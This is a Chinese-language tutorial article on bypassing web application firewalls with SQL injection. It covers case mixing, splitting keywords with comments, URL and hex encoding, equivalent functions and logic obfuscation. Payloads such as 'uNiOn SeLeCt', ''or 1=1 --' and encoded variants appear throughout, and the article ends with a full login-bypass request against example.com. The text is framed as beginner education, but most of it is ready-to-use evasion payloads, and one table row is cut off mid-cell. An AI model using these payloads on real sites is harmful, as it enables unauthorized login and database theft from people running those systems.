当前位置：首页 > news >正文

WAF拦不住？一篇搞懂SQL注入绕过原理与实战

news 2026/5/10 7:21:37

【引言】
想象一下，你要给一个加了严密安检的仓库（网站数据库）送一份“特殊快递”。门口的保安就是WAF（Web应用防火墙），手里拿着一张“黑名单照片”，专门抓长得像坏人的包裹（比如包裹上写着union select或者' or 1=1）。
但是，如果你把包裹换个包装、用暗号说话，或者把名字拆开写，保安可能就认不出来了。这就是SQL注入绕过WAF 的核心逻辑：不是去暴力破解大门，而是把自己伪装成“正常请求”，骗过安检规则。
本文专为初学者打造，不讲枯燥的理论，只讲“伪装术”的底层逻辑和实战案例。读完这篇，你不仅能看懂绕过原理，还能明白为什么有些“看似危险”的代码却能顺利通过防火墙。

一、前言：为什么WAF会被绕过？

WAF（Web应用防火墙）就像网站的“安检门”，专门拦截SQL注入、XSS等攻击。但它有个致命弱点：只能按预设规则检查流量。如果我们的攻击请求“伪装”成正常请求，就能骗过WAF。本文用“快递安检”打比方，带你理解绕过逻辑。

二、绕过WAF的核心原理

WAF的规则本质是“黑名单匹配”——比如看到union select就拦截。绕过的关键是：让恶意请求看起来不像规则里的“坏请求”。常见思路有4种：

思路	通俗解释	例子
规则盲区	WAF没覆盖所有语法	用`
编码伪装	把攻击代码“翻译”成其他形式	用`%27`代替单引号`'`
结构混淆	打乱SQL语句结构	用注释`/**/`分割关键词
逻辑欺骗	让WAF误以为是正常查询	用`1=1`但加干扰字符

三、实战绕过技巧

技巧1：大小写混合——最简单的“变装”

原理：WAF规则可能只匹配小写（如select），但SQL不区分大小写。

实例：

原攻击：union select 1,2,3

绕过后：uNiOn SeLeCt 1,2,3

效果：WAF可能只拦全小写的union select，但对混合大小写无反应。

技巧2：注释分割——把关键词“拆碎”

原理：用SQL注释/**/或--+插入关键词中间，让WAF无法匹配完整关键词。

实例：

原攻击：union select 1,2,3

绕过后：union/**/select 1,2,3或union--+select 1,2,3

效果：WAF规则可能只查union select连续字符串，分割后无法识别。

技巧3：编码替换——给字符“换马甲”

原理：用URL编码、十六进制编码等替换特殊字符，WAF可能无法解码检查。

实例：

原攻击：' or 1=1 --（单引号闭合）

绕过后：%27%20or%201=1%20--%20（URL编码单引号、空格）

或更隐蔽：0x27（十六进制单引号）

效果：WAF可能只拦明文'，但编码后的%27能直接通过。

技巧4：等价函数替换——用“同义词”骗WAF

原理：SQL中很多函数功能相同，但WAF可能只拦常用函数。

实例：

原攻击：union select user(),2,3（user()获取当前用户）

绕过后：union select current_user(),2,3（current_user()功能相同）

或：union select session_user(),2,3

效果：WAF可能只拦user()，但current_user()能绕过。

技巧5：逻辑混淆——让WAF“算不过来”

原理：用多余逻辑干扰WAF的判断，但数据库能正确执行。

实例：

原攻击：' or 1=1 --（永远为真）

绕过后：' or (1=1 and 2>1) --或' or 1=1 and 'a'='a

效果：WAF可能检查or 1=1的单一模式，但复杂逻辑会漏判。

四、真实场景实战案例

假设某网站登录框存在SQL注入，原始请求：

https://example.com/login?user=admin'&pass=123

WAF拦截admin'中的单引号。

绕过步骤：

编码单引号：admin%27→ 请求变为user=admin%27
添加注释干扰：admin%27/**/or/**/1=1--+→ 最终请求：
https://example.com/login?user=admin%27/**/or/**/1=1--+&pass=123
结果：WAF未拦截，数据库执行select * from users where user='admin'/**/or/**/1=1--+' and pass='123'，成功绕过。